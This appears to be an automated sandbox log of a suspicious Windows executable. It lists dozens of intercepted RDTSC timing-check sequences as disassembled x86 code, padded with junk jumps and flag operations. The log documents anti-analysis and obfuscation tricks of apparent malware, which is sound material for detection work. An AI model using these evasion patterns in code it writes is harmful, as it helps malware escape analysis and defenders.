Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54B004E second address: 54B00E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99150F94FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov cl, 2Ah 0x0000000d pushfd 0x0000000e jmp 00007F99150F9501h 0x00000013 or eax, 1E3F4B66h 0x00000019 jmp 00007F99150F9501h 0x0000001e popfd 0x0000001f popad 0x00000020 mov ebp, esp 0x00000022 pushad 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007F99150F94FAh 0x0000002a xor si, D308h 0x0000002f jmp 00007F99150F94FBh 0x00000034 popfd 0x00000035 pushfd 0x00000036 jmp 00007F99150F9508h 0x0000003b sub ch, 00000068h 0x0000003e jmp 00007F99150F94FBh 0x00000043 popfd 0x00000044 popad 0x00000045 mov bh, ah 0x00000047 popad 0x00000048 and esp, FFFFFFF8h 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 popad 0x00000051 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54B00E1 second address: 54B00E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54B00E5 second address: 54B00EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54B00EB second address: 54B00F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54B00F1 second address: 54B0116 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jmp 00007F99150F94FAh 0x0000000e mov dword ptr [esp], ecx 0x00000011 pushad 0x00000012 mov cx, FC0Dh 0x00000016 mov edx, ecx 0x00000018 popad 0x00000019 xchg eax, ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54B0116 second address: 54B0127 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99146B459Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54B0127 second address: 54B0164 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F99150F9507h 0x00000009 xor ecx, 34ED0C1Eh 0x0000000f jmp 00007F99150F9509h 0x00000014 popfd 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54B0164 second address: 54B01F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F99146B45A3h 0x00000010 and si, B62Eh 0x00000015 jmp 00007F99146B45A9h 0x0000001a popfd 0x0000001b pushfd 0x0000001c jmp 00007F99146B45A0h 0x00000021 xor al, FFFFFFA8h 0x00000024 jmp 00007F99146B459Bh 0x00000029 popfd 0x0000002a popad 0x0000002b pushfd 0x0000002c jmp 00007F99146B45A8h 0x00000031 or ch, 00000008h 0x00000034 jmp 00007F99146B459Bh 0x00000039 popfd 0x0000003a popad 0x0000003b xchg eax, ebx 0x0000003c pushad 0x0000003d push eax 0x0000003e push edx 0x0000003f mov bx, si 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54B01F2 second address: 54B0229 instructions: 0x00000000 rdtsc 0x00000002 call 00007F99150F94FEh 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov cx, dx 0x0000000d popad 0x0000000e mov ebx, dword ptr [ebp+10h] 0x00000011 jmp 00007F99150F94FDh 0x00000016 xchg eax, esi 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F99150F94FDh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54B0229 second address: 54B022F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54B022F second address: 54B0233 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54B0233 second address: 54B0237 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54B0237 second address: 54B0296 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F99150F9506h 0x0000000e xchg eax, esi 0x0000000f pushad 0x00000010 mov edx, 120AE940h 0x00000015 popad 0x00000016 mov esi, dword ptr [ebp+08h] 0x00000019 pushad 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c pushfd 0x0000001d jmp 00007F99150F94FCh 0x00000022 sub ax, CF88h 0x00000027 jmp 00007F99150F94FBh 0x0000002c popfd 0x0000002d popad 0x0000002e xchg eax, edi 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 call 00007F99150F94FBh 0x00000037 pop eax 0x00000038 push edi 0x00000039 pop ecx 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54B0296 second address: 54B02BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov edx, esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F99146B45A5h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54B02BA second address: 54B02BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54B02BE second address: 54B02C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54B02C4 second address: 54B0343 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F99150F94FAh 0x00000009 or eax, 6A824F78h 0x0000000f jmp 00007F99150F94FBh 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F99150F9508h 0x0000001b adc si, E9D8h 0x00000020 jmp 00007F99150F94FBh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 xchg eax, edi 0x0000002a jmp 00007F99150F9506h 0x0000002f test esi, esi 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F99150F9507h 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54B0343 second address: 54B0349 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54B0349 second address: 54B034D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54B034D second address: 54B0388 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99146B459Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F998612284Dh 0x00000011 jmp 00007F99146B45A6h 0x00000016 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001d pushad 0x0000001e mov edx, eax 0x00000020 push eax 0x00000021 push edx 0x00000022 mov ebx, ecx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54B0388 second address: 54B03E6 instructions: 0x00000000 rdtsc 0x00000002 movzx eax, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 je 00007F9986B67791h 0x0000000e jmp 00007F99150F9507h 0x00000013 mov edx, dword ptr [esi+44h] 0x00000016 jmp 00007F99150F9506h 0x0000001b or edx, dword ptr [ebp+0Ch] 0x0000001e pushad 0x0000001f mov esi, 6B610BCDh 0x00000024 mov dx, si 0x00000027 popad 0x00000028 test edx, 61000000h 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F99150F94FBh 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54B03E6 second address: 54B0436 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99146B45A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F998612281Bh 0x0000000f pushad 0x00000010 mov edx, esi 0x00000012 push eax 0x00000013 push edx 0x00000014 pushfd 0x00000015 jmp 00007F99146B45A6h 0x0000001a add ax, 59A8h 0x0000001f jmp 00007F99146B459Bh 0x00000024 popfd 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54B0436 second address: 54B0489 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F99150F9508h 0x00000008 jmp 00007F99150F9505h 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 test byte ptr [esi+48h], 00000001h 0x00000015 jmp 00007F99150F94FEh 0x0000001a jne 00007F9986B6771Bh 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 mov ax, bx 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54A0896 second address: 54A08B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F99146B45A9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54A08B3 second address: 54A08B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54A08B7 second address: 54A0909 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F99146B45A3h 0x00000011 adc cx, 0C8Eh 0x00000016 jmp 00007F99146B45A9h 0x0000001b popfd 0x0000001c movzx eax, dx 0x0000001f popad 0x00000020 and esp, FFFFFFF8h 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 mov cx, 44ABh 0x0000002a mov ecx, 266F8087h 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54A0909 second address: 54A0953 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99150F94FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b mov si, 5613h 0x0000000f pushfd 0x00000010 jmp 00007F99150F9508h 0x00000015 or eax, 4B82BC98h 0x0000001b jmp 00007F99150F94FBh 0x00000020 popfd 0x00000021 popad 0x00000022 push eax 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54A0953 second address: 54A0957 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54A0957 second address: 54A095B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54A095B second address: 54A0961 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54A0961 second address: 54A097B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99150F94FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov eax, edx 0x0000000f mov ch, bh 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54A097B second address: 54A0A13 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F99146B45A7h 0x00000009 adc ecx, 0F823F6Eh 0x0000000f jmp 00007F99146B45A9h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F99146B45A0h 0x0000001b adc ax, 92E8h 0x00000020 jmp 00007F99146B459Bh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 xchg eax, esi 0x0000002a pushad 0x0000002b jmp 00007F99146B45A4h 0x00000030 push eax 0x00000031 push edx 0x00000032 pushfd 0x00000033 jmp 00007F99146B45A0h 0x00000038 add cl, 00000078h 0x0000003b jmp 00007F99146B459Bh 0x00000040 popfd 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54A0A13 second address: 54A0A60 instructions: 0x00000000 rdtsc 0x00000002 movzx ecx, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push eax 0x00000009 jmp 00007F99150F9502h 0x0000000e xchg eax, esi 0x0000000f pushad 0x00000010 mov cl, ECh 0x00000012 jmp 00007F99150F9503h 0x00000017 popad 0x00000018 mov esi, dword ptr [ebp+08h] 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F99150F9505h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54A0A60 second address: 54A0A70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F99146B459Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54A0A70 second address: 54A0AC1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99150F94FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub ebx, ebx 0x0000000d pushad 0x0000000e movsx ebx, ax 0x00000011 pushfd 0x00000012 jmp 00007F99150F94FEh 0x00000017 or si, 79F8h 0x0000001c jmp 00007F99150F94FBh 0x00000021 popfd 0x00000022 popad 0x00000023 test esi, esi 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F99150F9505h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54A0AC1 second address: 54A0B6C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99146B45A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F9986129E4Eh 0x0000000f pushad 0x00000010 jmp 00007F99146B459Ch 0x00000015 popad 0x00000016 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001d jmp 00007F99146B45A7h 0x00000022 mov ecx, esi 0x00000024 pushad 0x00000025 pushad 0x00000026 push ecx 0x00000027 pop edx 0x00000028 mov eax, 3A8351ADh 0x0000002d popad 0x0000002e mov ch, 5Bh 0x00000030 popad 0x00000031 je 00007F9986129E22h 0x00000037 pushad 0x00000038 pushfd 0x00000039 jmp 00007F99146B459Bh 0x0000003e and cx, C5DEh 0x00000043 jmp 00007F99146B45A9h 0x00000048 popfd 0x00000049 popad 0x0000004a test byte ptr [76FA6968h], 00000002h 0x00000051 push eax 0x00000052 push edx 0x00000053 jmp 00007F99146B45A9h 0x00000058 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54A0B6C second address: 54A0B72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54A0B72 second address: 54A0B76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54A0B76 second address: 54A0B9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F9986B6ED2Eh 0x0000000e jmp 00007F99150F94FFh 0x00000013 mov edx, dword ptr [ebp+0Ch] 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54A0B9C second address: 54A0BA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54A0BA0 second address: 54A0BBB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99150F9507h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54A0BBB second address: 54A0BC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54A0BC1 second address: 54A0BC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54A0BC5 second address: 54A0BEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jmp 00007F99146B459Ch 0x0000000e mov dword ptr [esp], ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F99146B459Ah 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54A0BEB second address: 54A0BF1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54A0BF1 second address: 54A0C1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F99146B459Ch 0x00000008 pop esi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 call 00007F99146B45A2h 0x00000015 pop eax 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54A0C1C second address: 54A0C22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54A0C22 second address: 54A0C26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54A0C26 second address: 54A0C2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54A0C2A second address: 54A0C3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov cl, 66h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54A0C3B second address: 54A0C4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F99150F94FFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54A0C4E second address: 54A0C9A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99146B45A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push dword ptr [ebp+14h] 0x0000000e jmp 00007F99146B459Eh 0x00000013 push dword ptr [ebp+10h] 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F99146B45A7h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54A0D1C second address: 54A0D22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C0008 second address: 54C0022 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99146B45A6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C0022 second address: 54C0028 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C0028 second address: 54C002C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C002C second address: 54C0079 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99150F94FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F99150F94FEh 0x00000011 push eax 0x00000012 jmp 00007F99150F94FBh 0x00000017 xchg eax, ebp 0x00000018 jmp 00007F99150F9506h 0x0000001d mov ebp, esp 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C0079 second address: 54C007D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C007D second address: 54C009A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99150F9509h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C009A second address: 54C00A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C00A0 second address: 54C00A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54B0CC3 second address: 54B0CC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54B0CC7 second address: 54B0CCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54B0CCD second address: 54B0CF4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99146B45A2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F99146B459Eh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54B0CF4 second address: 54B0D06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F99150F94FEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54B0D06 second address: 54B0D0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54B0D0A second address: 54B0D5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F99150F9507h 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov ax, dx 0x00000016 pushfd 0x00000017 jmp 00007F99150F9507h 0x0000001c jmp 00007F99150F9503h 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54B0D5F second address: 54B0D65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54B0D65 second address: 54B0D69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55306E5 second address: 553078C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99146B45A7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F99146B45A9h 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 mov bl, ch 0x00000013 pushfd 0x00000014 jmp 00007F99146B45A9h 0x00000019 or ax, 9E06h 0x0000001e jmp 00007F99146B45A1h 0x00000023 popfd 0x00000024 popad 0x00000025 mov ebp, esp 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a pushfd 0x0000002b jmp 00007F99146B45A3h 0x00000030 and ax, 2D3Eh 0x00000035 jmp 00007F99146B45A9h 0x0000003a popfd 0x0000003b mov di, cx 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 553078C second address: 5530792 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5530792 second address: 5530796 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5530796 second address: 55307A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 pushad 0x0000000a mov cx, bx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55307A5 second address: 55307A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55208C2 second address: 55208DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F99150F9505h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C043C second address: 54C044E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F99146B459Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54C044E second address: 54C0477 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99150F94FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F99150F9505h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5520C00 second address: 5520C06 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
